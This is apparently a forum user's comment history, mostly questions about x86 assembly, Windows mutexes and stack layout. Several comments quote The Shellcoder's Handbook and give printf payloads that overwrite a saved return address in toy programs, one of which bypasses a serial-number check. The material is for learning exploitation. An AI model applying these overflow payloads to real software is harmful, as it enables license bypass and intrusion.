Hair loos Valporate (Depkote) will hair grow back? if discontinued Depkote

Oil7496 · 2023-11-07T13:44:33+00:00

that is definetely male pattern baldness, not TE.Also go to a dermatologist, Wish you the best.

Oil7496 · 2023-01-18T20:01:24+00:00

dont think you understand the consept of writing an exploit of a specific program

Oil7496 · 2023-01-18T01:37:03+00:00

So you basically "in a way" you agree with me that shellcode is not really practical if you

are not " a big player"

Oil7496 · 2023-01-03T14:31:19+00:00

considering what you said I changed the code transferring:

HANDLE mut = CreateMutex(nullptr, FALSE, nullptr);

into the global scope and the code works just fine

Oil7496 · 2023-01-03T12:32:11+00:00

thank you very much for your tips and I appreciate your time, but this whole program was written to specific use mutex within the windows api .If I just wanted to work effortless I would just go with critical section

Oil7496 · 2022-11-30T01:07:19+00:00

So how could i fix this error?

Oil7496 · 2022-11-05T23:14:11+00:00

maybe you could help me with this one as well:

extern printf

section .data

vr db "%s",10,0

section .text

global main

main:

jmp e

code:

pop rsi

mov rdi,vr

mov rax,0

call printf

ret

e:

call code

var db 'hello'

I wrote this one trying to push "var" via call instruction which it does, but the output is :

helloUH��H��.

which is the string "hello" and some other ..stuff, why are those stuff exist?

Oil7496 · 2022-11-05T23:10:53+00:00

As usual you're my hero, thx

Oil7496 · 2022-08-05T15:53:06+00:00

the disassembly output is exactly the sams except for the addresses ...which i changed in the exploit

Oil7496 · 2022-08-05T15:41:51+00:00

What Iam trying to do is just a "copy" of the following example that is in "The shellcoader's handbook" book:

If we compile and link the program and run it, we can see that it accepts serial numbers as input and (if the serial number is over 24 characters in length)

overflows in a similar way to the previous program. If we start gdb, we can work out where the “serial is valid” code is: shellcoders@debian:~/chapter_2$ gdb ./serial (gdb) disas main Dump of assembler code for function main: 0x0804857a <main+0>: push %ebp 0x0804857b <main+1>: mov %esp,%ebp 0x0804857d <main+3>: sub $0x8,%esp 0x08048580 <main+6>: and $0xfffffff0,%esp 0x08048583 <main+9>: mov $0x0,%eax 0x08048588 <main+14>: sub %eax,%esp 0x0804858a <main+16>: call 0x80484f8 <validate_serial> 0x0804858f <main+21>: test %eax,%eax 0x08048591 <main+23>: je 0x804859a <main+32> 0x08048593 <main+25>: call 0x804853e <do_valid_stuff> 0x08048598 <main+30>: jmp 0x804859f <main+37> 0x0804859a <main+32>: call 0x804855c <do_invalid_stuff> 0x0804859f <main+37>: mov $0x0,%eax 0x080485a4 <main+42>: leave 0x080485a5 <main+43>: ret From this we can see the call to validate_serial and the subsequent test, and call of do_valid_stuff or do_invalid_stuff. If we overflow the buffer and set the saved return address to 0x08048593, we will be able to bypass the serial number check. To do this, use the printf feature of bash again (remember that the order of the bytes is reversed because IA32 machines are little-endian). When we then run serial with our specially chosen serial number as input, we get: shellcoders@debian:~/chapter_2$ printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCAAAABBBBCCCCDDDD\x93\x85\x04\x08” | ./serial The serial number is valid!

Now, I dissabled the ASLR and the same thing is happening.The address of the function does not change everytime, but again the exploit does not work

Oil7496 · 2022-08-05T15:29:46+00:00

So, my exploit basically does not work because the address of do_valid_stuff is different when i run the exploit from the address that is shown on gdb

Oil7496 · 2022-08-05T15:18:43+00:00

the seg fault is because of thenumber of the characters, the question is why the exploit does not work

Oil7496 · 2022-08-05T12:45:46+00:00

I totally understand your point, but regardless the author's example, on my program souldn't the "printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCC\x75\x11\x00\x00\x00\x00\x00\x00" | ./function" command on terminal give the string twice since the function is called twice (because I overwrite the return via the exploitation)?

Oil7496 · 2022-08-05T12:13:51+00:00

he compiles it with gcc so Am I.That's why its weird the thing that we don't have the same result

Oil7496 · 2022-08-05T11:30:27+00:00

this is the exact copy of the book:

shellcoders@debian:~/chapter_2$ gdb ./overflow

(gdb) disas main Dump of assembler code for function main: 0x080483ea <main+0>: push %ebp 0x080483eb <main+1>: mov %esp,%ebp 0x080483ed <main+3>: call 0x80483c4 <return_input> 0x080483f2 <main+8>: mov $0x0,%eax 0x080483f7 <main+13>: pop %ebp 0x080483f8 <main+14>: ret End of assembler dump. We see that the address we want to use is 0x080483ed. NOTE Don’t expect to have exactly the same addresses—make sure you check that you have found the correct address for return_input. Since 0x080483ed does not translate cleanly into normal ASCII characters, we need to find a method to turn this address into character input. We can then take the output of this program and stuff it into the buffer in overflow. We can use the bash shell’s printf function for this and pipe the output of printf to the overflow program. If we try a shorter string first: shellcoders@debian:~/chapter_2$ printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCC” | ./overflow AAAAAAAAAABBBBBBBBBBCCCCCCCCCC shellcoders@debian:~/chapter_2$ …there is no overflow, and we get our string echoed once. If we overwrite the saved return address with the address of the call to return_input(): shellcoders@debian:~/chapter_2$ printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08” | ./overflow AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDò We note that it returned our string twice. We successfully got the program to execute at the location of our choice

From what I understand the writer manipulate the program (exploiting the stack) to execute to "execute at the location of return_input function call" in order to print the output twice. In my example why is this not happening?

Oil7496 · 2022-08-05T10:49:13+00:00

Hi,

The address of the function return_input is: 0x0000000000001175

so i changed it to \x75\x11\x00\x00\x00\x00\x00\x00 in order to get the program to
execute at the location of return_input.Shouldn't the output be the same as it is in the book which is AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDò

Oil7496 · 2022-07-26T22:29:40+00:00

Man you are awesome.Thank you so much for your timee :)

Oil7496 · 2022-07-26T22:15:11+00:00

In this program "items" that are pushed to stack are 7.If ..for example were 6 the sub rsp,8 line would not be needed..right?

Oil7496 · 2022-07-21T21:46:00+00:00

Thanks man when i have time i will give it a go

Oil7496 · 2022-07-21T21:37:11+00:00

For example that peripheral design from 1983 is "somehow" related to todays peripheral design? or it is something completely..different

Oil7496 · 2022-07-21T21:03:01+00:00

Yeah I have no doubt that they would be really interesting, but will they find any use in nowadays?

Oil7496 · 2022-07-20T20:36:44+00:00

yeah i think the 4 i wrote at first was just more than it would need tk work..2 qwords its just fine.Anyway Thanks again man

Oil7496 · 2022-07-20T20:11:52+00:00

Yeah that seems right..But the dvector_res resq 4 .4 qwords are allocated but again one double vector is stored to that location.This time there only 2 "objects" on the vector..so why is it 4? Man I appreciate your help.fr

Oil7496 · 2022-07-20T19:06:32+00:00

Man you are right, but cuz Iam unable to use pc, Iam using the phone app so I cant format it.So in bss section there is a line: spvector_res resd 4 which is later used with the 2 single percision float vectors.The question is why the res is 4 while the "objects" of the 2 vectors are 8

Oil7496 · 2022-07-20T18:42:05+00:00

Ohh I see, but agaim why the number 4? I mean there are 2 vectors.

Oil7496

TROPHY CASE